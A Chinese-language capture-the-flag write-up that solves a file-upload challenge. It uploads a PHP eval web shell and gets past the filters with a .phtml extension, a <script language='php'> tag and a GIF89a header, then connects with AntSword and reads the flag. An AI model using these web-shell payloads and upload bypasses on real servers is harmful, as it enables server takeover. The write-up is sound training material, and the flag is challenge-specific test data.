BUUCTF WEB [极客大挑战 2019]Upload
-
尝试提交一句话木马
shell.php
<?php @eval($_POST['shell']);?>
回显为
NOT!php!
说明需要修改文件后缀
-
修改文件后缀为
.phtml
后尝试提交,回显为NO! HACKER! your file included '<?'
说明不能包含
<?
,尝试绕过过滤 -
将文件内容修改为
<script language="php">eval($_POST['shell']);</script>
回显为
Don't lie to me, it's not image at all!!!
说明会检查文件内容,尝试修改文件头
-
将文件内容修改为
GIF89a <script language="php">eval($_POST['shell']);</script>
将其伪装成图片文件,回显为
上传文件名: shell.phtml
上传成功
-
使用蚁剑连接,这里需要猜测上传文件路径,最后的路径为
/upload/shell.phtml
-
在文件根目录下找到flag
flag{10b82eab-f326-4da4-9be7-eb3a6cc0378b}